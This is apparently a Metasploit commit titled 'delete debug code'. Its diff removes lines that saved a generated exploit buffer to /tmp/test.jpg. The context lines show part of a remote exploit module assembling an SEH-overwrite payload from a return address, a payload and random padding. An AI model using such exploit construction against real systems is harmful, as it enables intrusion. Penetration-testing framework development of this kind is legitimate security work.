delete debug code

unstable
jvazquez-r7 2013-03-18 16:28:39 +01:00
parent dffec1cd41
commit 4aab1cc5df
1 changed files with 0 additions and 4 deletions

View File

@ -86,10 +86,6 @@ class Metasploit3 < Msf::Exploit::Remote
sploit << generate_seh_record(target.ret)
sploit << p
sploit << rand_text(2388 - p.length)
f = ::File.open("/tmp/test.jpg", "wb")
f.write(sploit)
f.close
return sploit
end